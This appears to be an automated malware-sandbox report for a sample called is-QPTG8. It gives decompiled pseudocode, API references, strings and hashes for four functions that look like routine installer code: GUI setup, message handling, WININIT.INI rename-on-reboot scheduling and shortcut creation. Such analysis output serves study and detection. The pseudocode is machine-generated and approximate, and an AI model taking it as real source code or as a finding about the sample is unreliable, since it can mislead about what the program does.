API String ID: 3751190600-0
Opcode ID: e945e0b177c95f432154d37726f6d6a5ab7f959bc435cf2b34db26bf54b18a3a
Instruction ID: c410af5f5b8ba21e81adcbcc7d5009d7b9ffe9d4a61ec38023bf4b1fd5a38c08
Opcode Fuzzy Hash: e945e0b177c95f432154d37726f6d6a5ab7f959bc435cf2b34db26bf54b18a3a
Instruction Fuzzy Hash: 1E01E1617043607AE310BA7ADCC2B6F26C8DB84358F40053FF646DA3D3D9AD9C50826A

Uniqueness

Uniqueness Score: -1.00%

Function 0041E03C Relevance: 12.1, APIs: 8, Instructions: 60
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0041E03C(int __eax) {
				int _t2;

				_push(0);
				L00406034();
				_push(0x5a);
				_push(__eax);
				L00405D64();
				 *0x48d604 = __eax;
				_push(__eax);
				_push(0);
				L0040621C();
				_t2 =  *0x48d604; // 0x60
				 *0x48c4e8 =  ~(MulDiv(8, _t2, 0x48));
				 *0x48d608 = GetStockObject(7);
				 *0x48d60c = GetStockObject(5);
				 *0x48d610 = GetStockObject(0xd);
				 *0x48d614 = LoadIconA(0, 0x7f00);
				 *0x48d618 = E00419D54(0x2c, 1);
				 *0x48d61c = E00419D54(0x10, 1);
				 *0x48d620 = E00419D54(0x10, 1);
				 *0x48c568 = E00402C78(1);
				 *0x48d624 = E00402C78(1);
				return E0040B1B4(0x419278, E0041A280, E0041A2B0);
			}

0x0041e03d
0x0041e03f
0x0041e046
0x0041e048
0x0041e049
0x0041e04e
0x0041e053
0x0041e054
0x0041e056
0x0041e05d
0x0041e06c
0x0041e078
0x0041e084
0x0041e090
0x0041e0a1
0x0041e0b6
0x0041e0cb
0x0041e0e0
0x0041e0f1
0x0041e102
0x0041e11c

APIs

740BAC50.USER32(00000000,?,00419271,0048B2A5), ref: 0041E03F
740BAD70.GDI32(00000000,0000005A,00000000,?,00419271,0048B2A5), ref: 0041E049
740BB380.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419271,0048B2A5), ref: 0041E056
MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041E065
GetStockObject.GDI32(00000007), ref: 0041E073
GetStockObject.GDI32(00000005), ref: 0041E07F
GetStockObject.GDI32(0000000D), ref: 0041E08B
LoadIconA.USER32(00000000,00007F00), ref: 0041E09C

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ObjectStock$B380IconLoad
String ID:
API String ID: 1412791550-0
Opcode ID: c75976c9326c036be6d6781dba0c9366d28eb593293a4d4382b364edfb3a8bbc
Instruction ID: dd9410b35dba0f5ccb34aea041e51fac70e91536844c60efb4f12174f1097168
Opcode Fuzzy Hash: c75976c9326c036be6d6781dba0c9366d28eb593293a4d4382b364edfb3a8bbc
Instruction Fuzzy Hash: 8111E2B0A452055EE740BB6558527AE37A0D714748F00843FF609BF3D1E6791C449BAE

Uniqueness

Uniqueness Score: -1.00%

Function 0045D178 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 281
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0045D178(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				struct HICON__* _v12;
				signed int _v16;
				char _v17;
				signed int _v28;
				signed char _v32;
				signed char _v36;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v64;
				intOrPtr _t147;
				signed int _t160;
				signed char _t164;
				signed int _t167;
				signed char _t174;
				intOrPtr _t188;
				intOrPtr _t189;
				signed int _t198;
				signed int _t204;
				signed int _t207;
				void* _t210;
				void* _t213;
				intOrPtr _t214;
				intOrPtr _t217;
				void* _t227;
				intOrPtr _t234;
				signed char _t240;
				signed char _t242;
				intOrPtr _t263;
				signed int _t264;
				intOrPtr _t265;
				intOrPtr _t272;
				signed int _t276;
				intOrPtr _t280;
				void* _t282;
				void* _t286;
				void* _t291;
				void* _t293;
				signed char* _t299;
				intOrPtr _t300;
				intOrPtr _t301;
				void* _t302;
				void* _t304;
				void* _t305;
				void* _t306;
				intOrPtr _t307;
				void* _t308;

				_t296 = __edi;
				_t305 = _t306;
				_t307 = _t306 + 0xffffffc4;
				_v64 = 0;
				_v16 = 0;
				_t238 = __edx;
				_v8 = __eax;
				 *[fs:eax] = _t307;
				_t245 =  *_v8;
				 *((intOrPtr*)( *_v8 - 0x10))( *[fs:eax], 0x45d534, _t305, __edi, __esi, __ebx, _t304);
				_t147 =  *((intOrPtr*)(__edx + 8));
				_t263 =  *((intOrPtr*)(_t147 + 8));
				_t308 = _t263 - 0xfffffe6b;
				if(_t308 > 0) {
					_t264 = _t263 - 0xfffffe6d;
					__eflags = _t264;
					if(_t264 == 0) {
						_t299 = _t147 + 0xc;
						_v60 = 0;
						_v56 = _t299[4];
						__eflags =  *_t299 & 0x00000001;
						if(( *_t299 & 0x00000001) != 0) {
							_t174 = _t299[0x24];
							__eflags =  *((char*)(_t174 + 9));
							if( *((char*)(_t174 + 9)) == 0) {
								_t272 = _v8;
								__eflags =  *((char*)(_t272 + 0x101));
								if( *((char*)(_t272 + 0x101)) != 0) {
									 *((char*)(_t174 + 9)) = 1;
									_t243 =  *_v8;
									 *((intOrPtr*)( *_v8 + 0x7c))();
									E0045CB48(_v64,  &_v16);
									__eflags = _v16;
									if(_v16 != 0) {
										__eflags = _t299[0x24] + 4;
										E00403598(_t299[0x24] + 4, _t243, _v16, __edi, _t299);
									}
								}
							}
							__eflags = _t299[0x14] - 1;
							E004075E4(_t299[0x10], _t299[0x14] - 1,  *(_t299[0x24] + 4));
						}
						__eflags =  *_t299 & 0x00000002;
						if(( *_t299 & 0x00000002) != 0) {
							_t51 =  &_v60;
							 *_t51 = _v60 | 0x00000002;
							__eflags =  *_t51;
							_t242 =  *((intOrPtr*)( *_v8 + 0x84))(0);
							_v36 = _t242;
							_t299[0x18] = _t242;
						}
						__eflags =  *_t299 & 0x00000020;
						if(( *_t299 & 0x00000020) != 0) {
							_t62 =  &_v60;
							 *_t62 = _v60 | 0x00000020;
							__eflags =  *_t62;
							_t240 =  *((intOrPtr*)( *_v8 + 0x84))(1);
							_v32 = _t240;
							_t299[0x1c] = _t240;
						}
						__eflags =  *_t299 & 0x00000040;
						if(( *_t299 & 0x00000040) != 0) {
							_v60 = _v60 | 0x00000040;
							E004183F8(_v8);
							_t160 = E00409CAC();
							__eflags = _t160;
							_v28 = (_t160 & 0xffffff00 | _t160 != 0x00000000) & 0x0000007f;
							__eflags = _v28;
							if(_v28 == 0) {
								_t164 = _t299[0x24];
								__eflags =  *((char*)(_t164 + 8));
								if( *((char*)(_t164 + 8)) == 0) {
									_t167 =  *((intOrPtr*)( *_v8 + 0x8c))() & 0x0000007f;
									__eflags = _t167;
									_v28 = _t167;
								}
							}
							_t299[0x20] = _v28;
						}
						__eflags = _v60;
						if(_v60 != 0) {
							E00409D2C(E004183F8(_v8),  &_v60);
						}
					} else {
						_t276 = _t264 - 1;
						__eflags = _t276;
						if(_t276 == 0) {
							E0045D03C(_v8, __edx, __edi, __esi);
						} else {
							__eflags = _t276 - 0x190;
							if(__eflags == 0) {
								E0045D0C8(_t245, __eflags, _t305);
								 *(_t238 + 0xc) = 1;
							}
						}
					}
					goto L53;
				} else {
					if(_t308 == 0) {
						_t300 = _t147;
						__eflags =  *((intOrPtr*)(_t300 + 0xc)) - 2;
						if( *((intOrPtr*)(_t300 + 0xc)) != 2) {
							goto L53;
						} else {
							_t188 =  *((intOrPtr*)(_t300 + 0x5c));
							__eflags =  *((char*)(_t188 + 0xa));
							if( *((char*)(_t188 + 0xa)) != 0) {
								goto L53;
							} else {
								_t189 =  *((intOrPtr*)(_t300 + 0x5c));
								__eflags =  *((char*)(_t189 + 8));
								if( *((char*)(_t189 + 8)) != 0) {
									goto L53;
								} else {
									 *((char*)( *((intOrPtr*)(_t300 + 0x5c)) + 0xa)) = 1;
									_v12 = SetCursor(LoadCursorA(0, 0x7f02));
									 *[fs:eax] = _t307;
									 *((intOrPtr*)( *_v8 + 0x80))( *[fs:eax], 0x45d2a6, _t305);
									E004183F8(_v8);
									_t198 = E00409CAC();
									__eflags = _t198;
									if(_t198 == 0) {
										__eflags = 0;
										E0045D544(_v8, 0,  *((intOrPtr*)(_t300 + 0x3c)));
									}
									__eflags = 0;
									_pop(_t280);
									 *[fs:eax] = _t280;
									_push(0x45d516);
									return SetCursor(_v12);
								}
							}
						}
					} else {
						_t282 = _t263 - 0xfffffe61;
						if(_t282 == 0) {
							_t301 = _t147;
							__eflags =  *(_t301 + 0x14);
							if( *(_t301 + 0x14) != 0) {
								__eflags =  *(_t301 + 0x3c);
								if( *(_t301 + 0x3c) != 0) {
									E004183F8(_v8);
									_t210 = E00409CC4();
									E004183F8(_v8);
									_t213 = E00409CC4();
									__eflags = _t210 - _t213;
									if(_t210 != _t213) {
										_t128 = __edx + 0xc;
										 *_t128 =  *(__edx + 0xc) | 0x00000001;
										__eflags =  *_t128;
									}
								}
							}
							_t204 =  *(_t301 + 0x3c);
							__eflags = _t204;
							if(_t204 != 0) {
								_v60 = 8;
								_v56 = _t204;
								_v48 = 0x20;
								_t207 = E00409D14(E004183F8(_v8),  &_v60);
								__eflags = _t207;
								if(_t207 != 0) {
									__eflags = _v52 & 0x00000020;
									if((_v52 & 0x00000020) != 0) {
										_t139 = _t238 + 0xc;
										 *_t139 =  *(_t238 + 0xc) | 0x00000002;
										__eflags =  *_t139;
									}
								}
							}
						} else {
							_t286 = _t282 - 4;
							if(_t286 == 0) {
								_t302 = _t147 + 0xc;
								_t214 =  *((intOrPtr*)(_t302 + 0x24));
								__eflags =  *((char*)(_t214 + 8));
								if( *((char*)(_t214 + 8)) != 0) {
									__eflags =  *(_t302 + 0x10);
									if( *(_t302 + 0x10) != 0) {
										E00403674( &_v16,  *(_t302 + 0x10));
										_v17 = 1;
										_t217 = _v8;
										__eflags =  *((short*)(_t217 + 0x10e));
										if( *((short*)(_t217 + 0x10e)) != 0) {
											_t238 = _v8;
											 *((intOrPtr*)(_v8 + 0x10c))( &_v17);
										}
										__eflags = _v17;
										if(_v17 != 0) {
											E00403598( *((intOrPtr*)(_t302 + 0x24)), _t238, _v16, _t296, _t302);
											E00403598( *((intOrPtr*)(_t302 + 0x24)) + 4, _t238, _v16, _t296, _t302);
											E004183F8(_v8);
											_push(E00409CC4());
											_t227 = E004183F8(_v8);
											_pop(_t291);
											E00409D74(_t227, 0, _t291);
											E0045D03C(_v8, _t238, _t296, _t302);
										}
									}
								}
							} else {
								_t293 = _t286 - 1;
								if(_t293 == 0) {
									_t234 =  *((intOrPtr*)(_t147 + 0x30));
									__eflags =  *((char*)(_t234 + 8));
									if( *((char*)(_t234 + 8)) == 0) {
										 *(__edx + 0xc) = 1;
									}
								} else {
									if(_t293 == 1) {
										E00403CDC( *((intOrPtr*)(_t147 + 0x34)));
									}
								}
							}
						}
						L53:
						_pop(_t265);
						 *[fs:eax] = _t265;
						_push(0x45d53b);
						E00403548( &_v64);
						return E00403548( &_v16);
					}
				}
			}

0x0045d178
0x0045d179
0x0045d17b
0x0045d183
0x0045d186
0x0045d189
0x0045d18b
0x0045d199
0x0045d1a1
0x0045d1a3
0x0045d1a6
0x0045d1a9
0x0045d1ac
0x0045d1b2
0x0045d1da
0x0045d1da
0x0045d1e0
0x0045d2ad
0x0045d2b2
0x0045d2b8
0x0045d2bb
0x0045d2be
0x0045d2c0
0x0045d2c3
0x0045d2c7
0x0045d2c9
0x0045d2cc
0x0045d2d3
0x0045d2d5
0x0045d2e2
0x0045d2e4
0x0045d2ed
0x0045d2f2
0x0045d2f6
0x0045d2fb
0x0045d301
0x0045d301
0x0045d2f6
0x0045d2d3
0x0045d309
0x0045d313
0x0045d313
0x0045d318
0x0045d31b
0x0045d31d
0x0045d31d
0x0045d31d
0x0045d337
0x0045d339
0x0045d33c
0x0045d33c
0x0045d33f
0x0045d342
0x0045d344
0x0045d344
0x0045d344
0x0045d35e
0x0045d360
0x0045d363
0x0045d363
0x0045d366
0x0045d369
0x0045d36b
0x0045d372
0x0045d37a
0x0045d37f
0x0045d387
0x0045d38a
0x0045d38e
0x0045d390
0x0045d393
0x0045d397
0x0045d3a7
0x0045d3a7
0x0045d3aa
0x0045d3aa
0x0045d397
0x0045d3b0
0x0045d3b0
0x0045d3b3
0x0045d3b7
0x0045d3c8
0x0045d3c8
0x0045d1e6
0x0045d1e6
0x0045d1e6
0x0045d1e7
0x0045d3d5
0x0045d1ed
0x0045d1ed
0x0045d1f3
0x0045d499
0x0045d49f
0x0045d49f
0x0045d1f3
0x0045d1e7
0x00000000
0x0045d1b4
0x0045d1b4
0x0045d210
0x0045d212
0x0045d216
0x00000000
0x0045d21c
0x0045d21c
0x0045d21f
0x0045d223
0x00000000
0x0045d229
0x0045d229
0x0045d22c
0x0045d230
0x00000000
0x0045d236
0x0045d239
0x0045d24f
0x0045d25d
0x0045d268
0x0045d271
0x0045d279
0x0045d27e
0x0045d280
0x0045d282
0x0045d28a
0x0045d28a
0x0045d28f
0x0045d291
0x0045d294
0x0045d297
0x0045d2a5
0x0045d2a5
0x0045d230
0x0045d223
0x0045d1b6
0x0045d1b6
0x0045d1bc
0x0045d4a8
0x0045d4aa
0x0045d4ae
0x0045d4b0
0x0045d4b4
0x0045d4b9
0x0045d4c1
0x0045d4cb
0x0045d4d3
0x0045d4d8
0x0045d4da
0x0045d4dc
0x0045d4dc
0x0045d4dc
0x0045d4dc
0x0045d4da
0x0045d4b4
0x0045d4e0
0x0045d4e3
0x0045d4e5
0x0045d4e7
0x0045d4ee
0x0045d4f1
0x0045d503
0x0045d508
0x0045d50a
0x0045d50c
0x0045d510
0x0045d512
0x0045d512
0x0045d512
0x0045d512
0x0045d510
0x0045d50a
0x0045d1c2
0x0045d1c2
0x0045d1c5
0x0045d3fb
0x0045d3fe
0x0045d401
0x0045d405
0x0045d40b
0x0045d40f
0x0045d41b
0x0045d420
0x0045d424
0x0045d427
0x0045d42f
0x0045d438
0x0045d444
0x0045d444
0x0045d44a
0x0045d44e
0x0045d45a
0x0045d468
0x0045d470
0x0045d47d
0x0045d481
0x0045d488
0x0045d489
0x0045d491
0x0045d491
0x0045d44e
0x0045d40f
0x0045d1cb
0x0045d1cb
0x0045d1cc
0x0045d3e2
0x0045d3e5
0x0045d3e9
0x0045d3ef
0x0045d3ef
0x0045d1d2
0x0045d1d3
0x0045d206
0x0045d206
0x0045d1d3
0x0045d1cc
0x0045d1c5
0x0045d516
0x0045d518
0x0045d51b
0x0045d51e
0x0045d526
0x0045d533
0x0045d533
0x0045d1b4

APIs

LoadCursorA.USER32 ref: 0045D244
SetCursor.USER32(00000000,00000000,00007F02), ref: 0045D24A
SetCursor.USER32(00000000,0045D516,00007F02), ref: 0045D2A0

Strings

@, xrefs: 0045D36B
, xrefs: 0045D50C
, xrefs: 0045D4F1

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Cursor$Load
String ID: $ $@
API String ID: 1675784387-2546599590
Opcode ID: 9bd7001868351f52c6a0dc9a7808dd087e886db16c1752e90c176ebb1f5fbe19
Instruction ID: 157ba0cc8372cee28b2df8be4483f9e1a3fa4d01088a382cfda5585d36a2884e
Opcode Fuzzy Hash: 9bd7001868351f52c6a0dc9a7808dd087e886db16c1752e90c176ebb1f5fbe19
Instruction Fuzzy Hash: 23C15130E00608AFD724DF69C585A9EBBF1AF08309F14856AEC45977A3D778ED48CB49

Uniqueness

Uniqueness Score: -1.00%

Function 00452300 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00452300(char __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v41;
				char _v48;
				char _v52;
				void* __ecx;
				void* _t90;
				char _t141;
				void* _t151;
				char _t176;
				char _t177;
				intOrPtr _t180;
				intOrPtr _t188;
				intOrPtr _t195;
				intOrPtr _t219;
				intOrPtr _t229;
				intOrPtr _t230;

				_t227 = __esi;
				_t226 = __edi;
				_t229 = _t230;
				_t180 = 5;
				goto L1;
				L4:
				if(E0042DB78(_t90) != 0) {
					__eflags = _t176;
					if(_t176 == 0) {
						E00452228(_v8, _t176, _t181,  &_v48, _t226, _t227);
						E004035DC( &_v8, _v48);
						__eflags = _v12;
						if(_v12 != 0) {
							E00452228(_v12, _t176, _t181,  &_v48, _t226, _t227);
							E004035DC( &_v12, _v48);
						}
					}
					_t182 = _v12;
					__eflags = E00451794(_t176, _v12, _v8, 5);
					if(__eflags == 0) {
						E00451B58("MoveFileEx", _t176, _t182, _t226, _t227, __eflags);
					}
					__eflags = 0;
					_pop(_t195);
					 *[fs:eax] = _t195;
					_push(E0045263D);
					E00403568( &_v52, 2);
					E00403568( &_v40, 2);
					return E00403568( &_v24, 5);
				} else {
					E0042D8B4( &_v16);
					E0042C614(_v16,  &_v48);
					E00403708( &_v20, "WININIT.INI", _v48);
					E00451EA4(0, _t176, 0x452660, _v16, _t226, _t227,  &_v24);
					_push(_t229);
					_push(0x452595);
					_push( *[fs:eax]);
					 *[fs:eax] = _t230;
					_v28 = 0;
					_v32 = 0;
					_push(_t229);
					_push(0x45253f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t230;
					WritePrivateProfileStringA(0, 0, 0, E00403880(_v20));
					_v28 = E0044FF24(_v20, 1, 1, 0, 3);
					_t188 = _v24;
					_v32 = E004503B4(1, 0, 1, 0);
					_v41 = 0;
					_t177 = 0;
					while(E004502B0(_v28) == 0) {
						E004502C0(_v28, _t177,  &_v36, _t226, _t227);
						E00406C4C(_v36,  &_v40);
						__eflags = _v40;
						if(_v40 == 0) {
							L11:
							E0045049C(_v32, 1, _t188, _v36, _t226, _t227);
							_t177 = 0;
							__eflags = 0;
							continue;
						} else {
							__eflags =  *_v40 - 0x5b;
							if( *_v40 != 0x5b) {
								goto L11;
							} else {
								_t141 = E00406B28(_v40, "[rename]");
								__eflags = _t141;
								if(_t141 != 0) {
									__eflags = _v41;
									if(_v41 == 0) {
										goto L11;
									}
								} else {
									_v41 = 1;
									goto L11;
								}
							}
						}
						break;
					}
					if(_v41 == 0) {
						E0045049C(_v32, _t177, _t188, "[rename]", _t226, _t227);
					}
					if(_v12 == 0) {
						E004035DC( &_v40, 0x452684);
					} else {
						E0042D860(_v12, _t188,  &_v40);
					}
					E004035DC( &_v48, _v40);
					E004036C4( &_v48, 0x452690);
					_push( &_v48);
					E0042D860(_v8, _t188,  &_v52);
					_pop(_t151);
					E004036C4(_t151, _v52);
					E0045049C(_v32, _t177, _t188, _v48, _t226, _t227);
					if(_t177 != 0) {
						E0045049C(_v32, _t177, _t188, _v36, _t226, _t227);
					}
					while(E004502B0(_v28) == 0) {
						E004502C0(_v28, _t177,  &_v36, _t226, _t227);
						E0045049C(_v32, _t177, _t188, _v36, _t226, _t227);
					}
					_pop(_t219);
					 *[fs:eax] = _t219;
					_push(E00452546);
					E00402CA0(_v32);
					return E00402CA0(_v28);
				}
				L1:
				_push(0);
				_push(0);
				_t180 = _t180 - 1;
				if(_t180 != 0) {
					goto L1;
				} else {
					_push(_t180);
					_t1 =  &_v8;
					_t181 =  *_t1;
					 *_t1 = _t180;
					_push(__esi);
					_push(__edi);
					_v12 =  *_t1;
					_v8 = __edx;
					_t176 = __eax;
					E00403870(_v8);
					E00403870(_v12);
					_push(_t229);
					_push(0x452636);
					_push( *[fs:eax]);
					 *[fs:eax] = _t230;
					E0042C8F0(_v8,  &_v48);
					_t90 = E004035DC( &_v8, _v48);
					if(_v12 != 0) {
						E0042C8F0(_v12,  &_v48);
						_t90 = E004035DC( &_v12, _v48);
					}
				}
				goto L4;
			}

0x00452300
0x00452300
0x00452301
0x00452304
0x00452304
0x0045236f
0x00452376
0x004525ae
0x004525b0
0x004525b8
0x004525c3
0x004525c8
0x004525cc
0x004525d4
0x004525df
0x004525df
0x004525cc
0x004525e6
0x004525f3
0x004525f5
0x004525fc
0x004525fc
0x00452601
0x00452603
0x00452606
0x00452609
0x00452616
0x00452623
0x00452635
0x0045237c
0x0045237f
0x0045238a
0x0045239a
0x004523ad
0x004523b4
0x004523b5
0x004523ba
0x004523bd
0x004523c2
0x004523c7
0x004523cc
0x004523cd
0x004523d2
0x004523d5
0x004523e7
0x00452401
0x0045240a
0x00452419
0x0045241c
0x00452420
0x00452474
0x0045242a
0x00452437
0x0045243c
0x00452440
0x00452467
0x0045246d
0x00452472
0x00452472
0x00000000
0x00452442
0x00452445
0x00452448
0x00000000
0x0045244a
0x00452452
0x00452457
0x00452459
0x00452461
0x00452465
0x00000000
0x00000000
0x0045245b
0x0045245b
0x00000000
0x0045245b
0x00452459
0x00452448
0x00000000
0x00452440
0x00452484
0x0045248e
0x0045248e
0x00452497
0x004524ae
0x00452499
0x0045249f
0x0045249f
0x004524b9
0x004524c6
0x004524ce
0x004524d5
0x004524dd
0x004524de
0x004524e9
0x004524f0
0x004524f8
0x004524f8
0x00452515
0x00452505
0x00452510
0x00452510
0x00452523
0x00452526
0x00452529
0x00452531
0x0045253e
0x0045253e
0x00452309
0x00452309
0x0045230b
0x0045230d
0x0045230e
0x00000000
0x00452310
0x00452310
0x00452311
0x00452311
0x00452311
0x00452315
0x00452316
0x00452317
0x0045231a
0x0045231d
0x00452322
0x0045232a
0x00452331
0x00452332
0x00452337
0x0045233a
0x00452343
0x0045234e
0x00452357
0x0045235f
0x0045236a
0x0045236a
0x00452357
0x00000000

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004523E7

Strings

WININIT.INI, xrefs: 00452395
[rename], xrefs: 0045244A, 00452486
NUL, xrefs: 004524A9
MoveFileEx, xrefs: 004525F7
.tmp, xrefs: 004523A3

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
API String ID: 390214022-3304407042
Opcode ID: 7d4c874885961ad982ecbd9931170a781c0c89f31fdfb6e4cbb796c965dfbfee
Instruction ID: 85f1b18e2bc7e57fbdb0d44d40507634a4c2e59e2dae560debc06f3ffdabfebd
Opcode Fuzzy Hash: 7d4c874885961ad982ecbd9931170a781c0c89f31fdfb6e4cbb796c965dfbfee
Instruction Fuzzy Hash: 75910434E00209ABDF11EFA5D982BDEB7B5EF49305F508467E90077292D778AE09CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00454838 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 178
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00454838(void* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, short _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				char* _t53;
				intOrPtr* _t58;
				intOrPtr* _t63;
				intOrPtr* _t67;
				intOrPtr* _t71;
				void* _t73;
				intOrPtr* _t77;
				void* _t79;
				intOrPtr* _t83;
				intOrPtr* _t86;
				void* _t93;
				intOrPtr* _t100;
				intOrPtr* _t105;
				intOrPtr* _t111;
				intOrPtr* _t116;
				char* _t119;
				intOrPtr _t124;
				intOrPtr _t133;
				void* _t139;
				void* _t141;
				void* _t143;
				void* _t144;
				intOrPtr _t145;

				_t143 = _t144;
				_t145 = _t144 + 0xffffffec;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v24 = 0;
				_v8 = __ecx;
				_t139 = __edx;
				_t141 = __eax;
				_t124 = _a8;
				_push(_t143);
				_push(0x454a2e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t145;
				if(_t124 == 0) {
					_t53 = 0x80004005;
				} else {
					_t53 =  &_v12;
					_push(_t53);
					_push(0x48c788);
					_push(1);
					_push(0);
					_push(0x48ca24);
					L0042CD1C();
				}
				if(_t53 != 0) {
					_t124 = 0;
					_t119 =  &_v12;
					_push(_t119);
					_push(0x48c788);
					_push(1);
					_push(0);
					_push(0x48c778);
					L0042CD1C();
					_t148 = _t119;
					if(_t119 != 0) {
						E00451C00("CoCreateInstance", 0, _t119, _t139, _t141, _t148);
					}
				}
				_v16 = 0;
				_v20 = 0;
				 *[fs:edx] = _t145;
				_t58 = _v12;
				 *((intOrPtr*)( *_t58 + 0x50))(_t58, E00403880(_v8),  *[fs:edx], 0x454a11, _t143);
				_t63 = _v12;
				 *((intOrPtr*)( *_t63 + 0x2c))(_t63, E00403880(_a32));
				if(_a28 != 0) {
					_t116 = _v12;
					 *((intOrPtr*)( *_t116 + 0x24))(_t116, E00403880(_a28));
				}
				if(_a24 != 0) {
					_t111 = _v12;
					 *((intOrPtr*)( *_t111 + 0x44))(_t111, E00403880(_a24), _a20);
				}
				_t67 = _v12;
				 *((intOrPtr*)( *_t67 + 0x3c))(_t67, _a16);
				if(_t139 != 0) {
					_t105 = _v12;
					 *((intOrPtr*)( *_t105 + 0x1c))(_t105, E00403880(_t139));
				}
				if(_a12 != 0) {
					_t100 = _v12;
					 *((intOrPtr*)( *_t100 + 0x34))(_t100, _a12);
				}
				_t71 = _v12;
				_t73 =  *((intOrPtr*)( *_t71))(_t71, 0x48c758,  &_v16);
				_t153 = _t73;
				if(_t73 != 0) {
					_t73 = E00451C00("IShellLink::QueryInterface", _t124, _t73, _t139, _t141, _t153);
				}
				if(_t124 == 0) {
					L19:
					_v20 = E00403DEC(_t141);
					goto L20;
				} else {
					_t93 = E00454740(_t73);
					_t155 = _t93;
					if(_t93 == 0) {
						goto L19;
					}
					E0042C6B8(_t141, _t124,  &_v24, 0, _t139, _t141, _t155);
					_v20 = E00403DEC(_v24);
					L20:
					if(_v20 == 0) {
						E00408DE4();
					}
					_t77 = _v16;
					_t79 =  *((intOrPtr*)( *_t77 + 0x18))(_t77, _v20, 1);
					_t157 = _t79;
					if(_t79 != 0) {
						E00451C00("IPersistFile::Save", _t124, _t79, _t139, _t141, _t157);
					}
					E00454750(_v16, _t124, _a4, _t141, _t139, _t141, _t157);
					_pop(_t133);
					 *[fs:eax] = _t133;
					_push(0x454a18);
					if(_v20 != 0) {
						_push(_v20);
						L0042CD4C();
					}
					if(_v16 != 0) {
						_t86 = _v16;
						 *((intOrPtr*)( *_t86 + 8))(_t86);
					}
					_t83 = _v12;
					return  *((intOrPtr*)( *_t83 + 8))(_t83);
				}
			}

0x00454839
0x0045483b
0x0045483e
0x0045483f
0x00454840
0x00454843
0x00454846
0x00454849
0x0045484b
0x0045484d
0x00454852
0x00454853
0x00454858
0x0045485b
0x00454860
0x0045487b
0x00454862
0x00454862
0x00454865
0x00454866
0x0045486b
0x0045486d
0x0045486f
0x00454874
0x00454874
0x00454882
0x00454884
0x00454886
0x00454889
0x0045488a
0x0045488f
0x00454891
0x00454893
0x00454898
0x0045489d
0x0045489f
0x004548a8
0x004548a8
0x0045489f
0x004548af
0x004548b4
0x004548c2
0x004548ce
0x004548d4
0x004548e0
0x004548e6
0x004548ed
0x004548f8
0x004548fe
0x004548fe
0x00454905
0x00454914
0x0045491a
0x0045491a
0x00454921
0x00454927
0x0045492c
0x00454936
0x0045493c
0x0045493c
0x00454944
0x0045494b
0x00454951
0x00454951
0x0045495d
0x00454963
0x00454965
0x00454967
0x00454970
0x00454970
0x00454977
0x0045499b
0x004549a2
0x00000000
0x00454979
0x00454979
0x0045497e
0x00454980
0x00000000
0x00000000
0x00454989
0x00454996
0x004549a5
0x004549a9
0x004549ab
0x004549ab
0x004549b6
0x004549bc
0x004549bf
0x004549c1
0x004549ca
0x004549ca
0x004549d7
0x004549de
0x004549e1
0x004549e4
0x004549ed
0x004549f2
0x004549f3
0x004549f3
0x004549fc
0x004549fe
0x00454a04
0x00454a04
0x00454a07
0x00454a10
0x00454a10

APIs

7677B690.OLE32(0048CA24,00000000,00000001,0048C788,?,00000000,00454A2E), ref: 00454874

